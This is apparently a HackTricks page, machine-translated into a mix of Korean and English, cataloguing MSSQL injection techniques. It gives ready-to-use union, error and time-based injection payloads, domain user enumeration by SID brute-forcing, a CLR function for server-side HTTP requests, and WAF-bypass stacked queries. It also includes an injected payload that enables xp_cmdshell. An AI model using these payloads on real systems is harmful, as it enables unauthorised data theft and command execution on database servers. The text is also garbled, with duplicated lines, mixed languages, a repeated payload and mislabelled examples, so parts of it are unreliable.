다음 MSSQL 함수를 사용하여 MSSQL 서버 내에서 SQL 인젝션을 통해 도메인 사용자를 열거할 수 있습니다:
SELECT DEFAULT_DOMAIN(): 현재 도메인 이름을 가져옵니다.
master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator')): 도메인 이름을 알고 있다면 (이 예제에서는 DOMAIN) 이 함수는 사용자 Administrator의 SID를 16진수 형식으로 반환합니다. 이는 0x01050000000[...]0000f401와 같이 보일 것입니다. 마지막 4바이트는 big endian 형식으로 500이라는 숫자입니다. 이는 사용자 administrator의 일반적인 ID입니다.
이 함수를 사용하면 도메인의 ID를 알 수 있습니다 (마지막 4바이트를 제외한 모든 바이트).
SUSER_SNAME(0x01050000000[...]0000e803) : 이 함수는 지정된 ID의 사용자 이름을 반환합니다. 이 경우에는 0000e803이며 big endian == 1000입니다 (일반적으로 이는 처음으로 생성된 일반 사용자 ID입니다). 그런 다음 1000에서 2000까지 사용자 ID를 브루트 포스팅하고 도메인 사용자의 모든 사용자 이름을 얻을 수 있습니다. 예를 들어 다음과 같은 함수를 사용할 수 있습니다:
defget_sid(n):domain ='0x0105000000000005150000001c00d1bcd181f1492bdfc236'user = struct.pack('<I', int(n))user = user.hex()returnf"{domain}{user}"#if n=1000, get SID of the user with ID 1000
대체 오류 기반 벡터
오류 기반 SQL 인젝션은 일반적으로 +AND+1=@@version--와 같은 구조를 가지며, «OR» 연산자를 기반으로 한 변형도 포함됩니다. 이러한 표현을 포함하는 쿼리는 일반적으로 WAF에 의해 차단됩니다. 우리가 찾고자 하는 데이터에 대한 데이터 유형 변환 오류를 유발하는 특정 함수 호출의 결과를 %2b 문자를 사용하여 문자열과 연결하여 우회합니다.
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';# Or doingUsemaster;EXEC sp_helprotect 'fn_xe_file_target_read_file';
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';# Or doingUsemaster;EXEC sp_helprotect 'fn_get_audit_file';
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';# Or doingUsemaster;EXEC sp_helprotect 'fn_trace_gettabe';
xp_dirtree, xp_fileexists, xp_subdirs
xp_dirtree와 같은 저장 프로시저는 Microsoft에서 공식적으로 문서화되지 않았지만, MSSQL 내에서 네트워크 작업에 유용하다는 이유로 다른 사람들에 의해 설명되었습니다. 이러한 프로시저들은 종종 Out of Band Data 유출에 사용되며, 다양한 예제와 포스트에서 이를 보여줍니다.
예를 들어, xp_dirtree 저장 프로시저는 네트워크 요청을 수행하지만 TCP 포트 445에만 제한됩니다. 포트 번호는 수정할 수 없지만, 네트워크 공유에서 읽을 수 있습니다. 아래의 SQL 스크립트에서 사용법이 설명되어 있습니다:
이 방법은 모든 시스템 구성에서 작동하지 않을 수 있습니다. 예를 들어, 기본 설정으로 실행 중인 Windows Server 2016 Datacenter에서 실행되는 Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)에서는 작동하지 않을 수 있습니다.
또한, master..xp_fileexist와 xp_subdirs와 같은 대체 저장 프로시저를 사용하여 비슷한 결과를 얻을 수 있습니다. xp_fileexist에 대한 자세한 내용은 TechNet 기사에서 확인할 수 있습니다.
xp_cmdshell
물론 **xp_cmdshell**을 사용하여 SSRF를 유발하는 것을 실행할 수도 있습니다. 자세한 내용은 다음 페이지에서 관련 섹션을 읽어보세요:
MSSQL에서 사용자 정의 함수(CLR UDF - Common Language Runtime User Defined Function)를 생성하는 것은 .NET 언어로 작성된 코드를 DLL로 컴파일하여 MSSQL에서 로드하여 사용자 정의 함수를 실행하는 프로세스입니다. 이는 일반적으로 sa로 데이터베이스 연결이 이루어지거나 관리자 역할로 연결되었을 때에만 가능합니다.
MSSQL에 이진 파일을 CLR 어셈블리로 로드하기 위한 Visual Studio 프로젝트와 설치 지침은 이 Github 저장소에서 제공됩니다. 이를 통해 MSSQL 내에서 HTTP GET 요청을 실행할 수 있도록 합니다.
이 기능의 핵심은 http.cs 파일에 캡슐화되어 있으며, 아래와 같이 WebClient 클래스를 사용하여 GET 요청을 실행하고 내용을 검색합니다:
usingSystem.Data.SqlTypes;usingSystem.Net;publicpartialclassUserDefinedFunctions{[Microsoft.SqlServer.Server.SqlFunction]publicstaticSqlStringhttp(SqlString url){var wc =newWebClient();var html =wc.DownloadString(url.Value);returnnewSqlString(html);}}
CREATE ASSEMBLY SQL 명령을 실행하기 전에, 서버의 신뢰할 수 있는 어셈블리 목록에 어셈블리의 SHA512 해시를 추가하기 위해 다음 SQL 코드 조각을 실행하는 것이 좋습니다 ( select * from sys.trusted_assemblies;를 통해 확인 가능):
단일 쿼리에서 테이블의 전체 내용을 추출하는 간결한 방법은 FOR JSON 절을 활용하는 것입니다. 이 접근 방식은 "raw"와 같은 특정 모드를 필요로 하는 FOR XML 절보다 간결합니다. FOR JSON 절은 간결성을 위해 선호됩니다.
현재 데이터베이스에서 스키마, 테이블 및 열을 검색하는 방법은 다음과 같습니다:
https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--
In situations where error-based vectors are used, it's crucial to provide an alias or a name. This is because the output of expressions, if not provided with either, cannot be formatted as JSON. Here's an example of how this is done:
```sql## MSSQL Injection### Union-Based SQL Injection#### Basic Union-Based SQL InjectionTo perform a basic union-based SQL injection attack on a MSSQL database, you can use the following payload:
?id=1' UNION ALL SELECT NULL,NULL,NULL-- -
This payload appends a union statement to the original SQL query, allowing you to retrieve data from other tables.
#### Retrieving Database Information
To retrieve information about the database, such as the version or the current user, you can use the following payload:
?id=1' UNION ALL SELECT NULL,@@version,NULL-- -
This payload uses the `@@version` function to retrieve the MSSQL server version.
#### Enumerating Tables and Columns
To enumerate the tables and columns in the database, you can use the following payload:
?id=1' UNION ALL SELECT NULL,table_name,NULL FROM information_schema.tables-- -
This payload retrieves the names of all the tables in the database.
To retrieve the columns of a specific table, you can use the following payload:
?id=1' UNION ALL SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='your_table_name'-- -
Replace `'your_table_name'` with the name of the table you want to retrieve the columns from.
#### Extracting Data
To extract data from a specific table and column, you can use the following payload:
?id=1' UNION ALL SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='your_table_name'-- -
Replace `'your_table_name'` with the name of the table you want to extract data from.
### Error-Based SQL Injection
#### Extracting Data
To extract data using error-based SQL injection, you can use the following payload:
?id=1' AND (SELECT COUNT(*) FROM sysobjects)>0-- -
If the query returns an error, it means that the condition is true. You can then modify the payload to extract the desired data.
### Time-Based Blind SQL Injection
#### Extracting Data
To extract data using time-based blind SQL injection, you can use the following payload:
?id=1' AND (SELECT * FROM sys.sysmessages WHERE message_id=1 AND 1=(SELECT COUNT(*) FROM sys.sysmessages AS sys1, sys.sysmessages AS sys2, sys.sysmessages AS sys3, sys.sysmessages AS sys4))-- -
If the query takes a longer time to execute, it means that the condition is true. You can then modify the payload to extract the desired data.
For users granted the VIEW SERVER STATE permission on the server, it's possible to see all executing sessions on the SQL Server instance. However, without this permission, users can only view their current session. The currently executing SQL query can be retrieved by accessing sys.dm_exec_requests and sys.dm_exec_sql_text:
## MSSQL Injection### Union-Based SQL InjectionThe Union-Based SQL Injection technique allows an attacker to retrieve sensitive information from a vulnerable MSSQL database. By exploiting this vulnerability, an attacker can manipulate the SQL query to retrieve data that they are not authorized to access.
#### Exploiting the VulnerabilityTo exploit the vulnerability, the attacker can modify the SQL query by injecting a UNION SELECT statement. This statement allows the attacker to combine the result of their injected query with the original query, effectively retrieving additional data.
For example, consider the following vulnerable URL:
In this case, the attacker is injecting a UNION SELECT statement to retrieve the text of the SQL query being executed by the server. The injected query retrieves the text using the `sys.dm_exec_requests` and `sys.dm_exec_sql_text` functions.
#### Protection and Prevention
To protect against Union-Based SQL Injection attacks, it is important to implement proper input validation and parameterized queries. Input validation ensures that user-supplied data is properly sanitized and validated before being used in SQL queries. Parameterized queries, on the other hand, separate the SQL code from the user-supplied data, preventing the injection of malicious code.
Additionally, keeping the MSSQL server and its components up to date with the latest security patches can help mitigate the risk of SQL Injection vulnerabilities. Regular security audits and penetration testing can also help identify and address any potential vulnerabilities in the system.
To check if you have the VIEW SERVER STATE permission, the following query can be used:
```sqlSELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
fn_my_permissions(NULL, 'SERVER') 함수에서 'VIEW SERVER STATE' 권한을 가진 권한을 가진 사용자의 모든 정보를 선택합니다.
## **Little tricks for WAF bypasses**
[Tricks also from here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
Non-standard whitespace characters: %C2%85 или %C2%A0:
MSSQL Injection
개요
MSSQL Injection은 웹 응용 프로그램에서 발생하는 SQL 삽입 공격의 한 형태입니다. 이 공격은 악의적인 사용자가 웹 응용 프로그램의 취약점을 이용하여 데이터베이스에 액세스하고 조작하는 것을 가능하게 합니다. 이 문서에서는 MSSQL Injection의 기본 개념과 공격 기술에 대해 설명합니다.
UNION 기반 MSSQL Injection
UNION 기반 MSSQL Injection은 UNION 연산자를 이용하여 SQL 삽입을 수행하는 기술입니다. UNION 연산자는 두 개의 SELECT 문의 결과를 결합하는 데 사용됩니다. 이를 이용하여 악의적인 사용자는 UNION 연산자를 이용하여 원하는 데이터를 추출할 수 있습니다.
### WAF Bypass with unorthodox stacked queries
According to [**this blog post**](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/) it's possible to stack queries in MSSQL without using ";":
```sql
```sql
SELECT 'a' SELECT 'b'
SELECT'a'SELECT'b'
SELECT'a'SELECT'b'
So for example, multiple queries such as:
```sql
```sql
use [tempdb]
create table [test] ([id] int)
insert [test] values(1)
select [id] from [test]
drop table[test]
use [tempdb]createtable [test] ([id] int)insert [test] values(1)select [id] from [test]droptable[test]
use [tempdb]createtable [test] ([id] int)insert [test] values(1)select [id] from [test]droptable[test]
use [tempdb]createtable [test] ([id] int)insert [test] values(1)select [id] from [test]droptable[test]
Can be reduced to:
```sql
다음은 MSSQL 삽입(SQL Injection)에 대한 내용입니다.
```sql
use[tempdb]create/**/table[test]([id]int)insert[test]values(1)select[id]from[test]drop/**/table[test]
위의 코드는 MSSQL 데이터베이스에서 삽입(SQL Injection)을 수행하는 예시입니다. 이 코드는 다음과 같은 작업을 수행합니다:
tempdb 데이터베이스를 사용합니다.
test라는 이름의 테이블을 생성합니다. 이 테이블은 id라는 정수형 열을 가지고 있습니다.
test 테이블에 1이라는 값을 삽입합니다.
test 테이블에서 id 값을 선택합니다.
test 테이블을 삭제합니다.
이 코드는 MSSQL 데이터베이스에서 삽입(SQL Injection)을 수행하는 방법을 보여주기 위한 예시입니다.
Therefore it could be possible to bypass different WAFs that doesn't consider this form of stacking queries. For example:
끝에 쓸모없는 exec()를 추가하고 WAF가 이것이 유효한 쿼리가 아니라고 생각하게 만들기
select * from users where username = ' admin' exec('sp_configure''show advanced option'',''1''reconfigure') exec('sp_configure''xp_cmdshell'',''1''reconfigure')--'
## References
* [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
* [https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
